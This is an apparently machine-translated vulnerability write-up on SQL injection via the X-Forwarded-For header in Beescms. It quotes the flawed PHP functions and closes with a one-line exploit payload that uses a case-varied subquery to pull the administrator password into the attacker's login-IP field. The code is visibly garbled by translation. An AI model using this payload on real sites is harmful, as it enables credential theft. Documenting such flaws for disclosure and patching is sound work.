Beescms X-Forwarded-For Injection

Member/member. php file
//........................
$ Ip = fl_html (fl_value (get_ip ()));
$ SQL = "update". DB_PRE. "member set member_time = '{$ addtime}', member_ip = '{$ ip}' where id = {$ last_id }";
$ GLOBALS ['mysql']-> query ($ SQL );
//........................
Tracking. {$ _ SESSION ['m _ ip']} source.
Elseif ($ action = 'out '){
$ M_ip = fl_html (fl_value (get_ip ()));
$ _ SESSION ['m _ ip'] = $ m_ip;
Tracking. Fl_html (fl_value (get_ip () source.
Get_ip () function www.2cto.com
Function get_ip (){
If (! Empty ($ _ SERVER ['HTTP _ CLIENT_IP '])
{
Return $ _ SERVER ['HTTP _ CLIENT_IP '];
}
Elseif (! Empty ($ _ SERVER ['HTTP _ X_FORWARDED_FOR '])
{
Return $ _ SERVER ['HTTP _ X_FORWARDED_FOR '];
}
Else
Return $ _ SERVER ['remote _ ADDR '];
}
}
The get_ip () function can be forged.
Fl_value () function
Function fl_value ($ str ){
If (empty ($ str) {return ;}
Return preg_replace ('/select | insert | update | and | in | on | left | joins | delete | \ % | \ sss =|\/ \ * | \. \. \/| \. \/| union | from | where | group | into | load_file
| Outfile/', '', $ str); // case sensitive information can be bypassed.
}
The fl_html () function does not affect us.
Function fl_html ($ str ){
Return htmlspecialchars ($ str );
}
Exp: Registered User. Modify X-Forwarded-For: 127.1 ', member_ip = (SELECT admin_password FROM bees_admin) whEre member_user = 'your user '#. Log on. The last logon IP address changed to the administrator password.